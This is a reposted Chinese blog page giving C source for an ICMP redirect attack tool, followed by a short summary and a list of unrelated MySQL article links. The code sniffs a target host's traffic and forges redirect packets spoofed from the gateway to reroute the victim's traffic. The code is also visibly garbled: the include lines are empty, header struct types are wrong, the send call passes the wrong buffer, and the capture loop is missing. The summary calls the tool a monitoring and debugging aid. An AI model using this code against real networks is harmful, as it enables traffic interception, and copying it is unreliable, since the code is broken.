博客
关于我
信息安全-ICMP重定向攻击实现代码
阅读量:788 次
发布时间:2019-03-25

本文共 3694 字,大约阅读时间需要 12 分钟。

#include 
#include
#include
#include
#include
#include
#include
#define MAX 1024 #define SIZE_ETHERNET 14 char *TARGET_IP; char *REDIRECT_IP; char *GW_IP; struct sockaddr_in target_ip, restrict_ip, gw_ip; struct ip_header { uint8_t version; uint8_t header_length; uint8_t tos; uint8_t total_length; uint16_t id; uint16_t frag_off; uint8_t ttl; uint8_t protocol; uint16_t checksum; struct in_addr source_address; struct in_addr destination_address; }; struct icmp_header { uint8_t type; uint8_t code; uint16_t checksum; struct in_addr gateway_addr; }; uint16_t checksum(uint8_t *buf, int len) { uint32_t sum = 0; uint16_t *cbuf = (uint16_t *)buf; while (len > 1) { sum += *cbuf++; len -= 2; } if (len) { sum += *(uint8_t *)cbuf; } sum = (sum >> 16) + (sum & 0xffff); return ~sum; } void icmp_redirect(int sockfd, const unsigned char *data, int datalen) { struct sockaddr_in dest; struct packet { struct ip_header iph; struct icmp_header icmph; char data[28]; } packet; packet.iph.version = 4; packet.iph.header_length = 5; packet.iph.tos = 0; packet.iph.total_length = htons(56); packet.iph.frag_off = 0; packet.iph.ttl = 255; packet.iph.protocol = IPPROTO_ICMP; packet.iph.checksum = 0; packet.iph.source_address = gw_ip.sin_addr; packet.iph.destination_address = target_ip.sin_addr; packet.icmph.type = ICMP_REDIRECT; packet.icmph.code = ICMP_REDIRECT_HOST; packet.icmph.checksum = 0; packet.icmph.gateway_addr = restrict_ip.sin_addr; memcpy(packet.data, data + SIZE_ETHERNET, 28); packet.iph.checksum = checksum((uint8_t *)&packet.iph, sizeof(packet.iph)); packet.icmph.checksum = checksum((uint8_t *)&packet.icmph, sizeof(packet.icmph) + 28); dest.sin_family = AF_INET; dest.sin_addr = target_ip.sin_addr; sendto(sockfd, (const struct sockaddr *)&dest, sizeof(dest), 0, (const struct sockaddr *)&dest, sizeof(dest)); printf("Redirect packets have been sent....\n\n"); } void getPacket(u_char *args, const struct pcap_pkthdr *pkthdr, const u_char *packet) { int sockfd, res; int one = 1; int *ptr_one = &one; if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { printf("Error creating socket\n"); return; } res = setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one)); if (res < 0) { printf("Error setting socket options\n"); return; } icmp_redirect(sockfd, packet, 0); } void setup_sniffer(char *dev) { char errbuf[PCAP_ERRBUF_SIZE]; bpf_u_int32 mask, net; if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { net = 0; mask = 0; } pcap_t *device = pcap_open_live(dev, 65535, 1, 0, errbuf); if (device == NULL) { printf("Error opening device\n"); return; } struct bpf_program filter; char filterstr[50] = {0}; sprintf(filterstr, "src host %s", inet_ntoa(target_ip.sin_addr)); if (pcap_compile(device, &filter, filterstr, 1, net) == -1) { printf("Error compiling filter\n"); return; } pcap_setfilter(device, &filter); printf("Sniffing at %s....\n\n", TARGET_IP); } int main(int argc, const char *argv) { if (argc != 5) { printf("Usage: %s target_ip redirect_ip gateway_ip sniff_dev\n", argv[0]); return 1; } if (inet_aton(argv[1], &target_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[1]); return 1; } if (inet_aton(argv[2], &restrict_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[2]); return 1; } if (inet_aton(argv[3], &gw_ip.sin_addr) == 0) { printf("Bad IP address %s\n", argv[3]); return 1; } char *dev = argv[4]; printf("Target: %s\nRedirect: %s\nGW: %s\nDevice: %s\n\n", TARGET_IP, REDIRECT_IP, GW_IP, dev); setup_sniffer(dev); }

以上代码实现了一个网络嗅探和ICMP重定向的工具,主要功能包括:

  • 捕获目标网络上的数据包
  • 构造并发送带有ICMP重定向指令的伪造包
  • 使用pcap库进行网络嗅探和数据包分析
  • 该工具可以用来进行网络流量监控和调试,适用于需要理解网络数据包结构和协议的开发和学习。

    转载地址:http://qwbuk.baihongyu.com/

    你可能感兴趣的文章
    mysql同主机下 复制一个数据库所有文件到另一个数据库
    查看>>
    mysql启动以后会自动关闭_驾照虽然是C1,一直是开自动挡的车,会不会以后就不会开手动了?...
    查看>>
    mysql启动和关闭外键约束的方法(FOREIGN_KEY_CHECKS)
    查看>>
    Mysql启动失败解决过程
    查看>>
    MySQL启动失败:Can't start server: Bind on TCP/IP port
    查看>>
    mysql启动报错
    查看>>
    mysql启动报错The server quit without updating PID file几种解决办法
    查看>>
    MySQL命令行登陆,远程登陆MySQL
    查看>>
    mysql命令:set sql_log_bin=on/off
    查看>>
    mySQL和Hive的区别
    查看>>
    MySQL和Java数据类型对应
    查看>>
    mysql和oorcale日期区间查询【含左右区间问题】
    查看>>
    MYSQL和ORACLE的一些操作区别
    查看>>
    mysql和redis之间互相备份
    查看>>
    MySQL和SQL入门
    查看>>
    mysql在centos下用命令批量导入报错_Variable ‘character_set_client‘ can‘t be set to the value of ‘---linux工作笔记042
    查看>>
    Mysql在Linux运行时新增配置文件提示:World-wrirable config file ‘/etc/mysql/conf.d/my.cnf‘ is ignored 权限过高导致
    查看>>
    Mysql在Windows上离线安装与配置
    查看>>
    MySQL在渗透测试中的应用
    查看>>
    Mysql在离线安装时启动失败:mysql服务无法启动,服务没有报告任何错误
    查看>>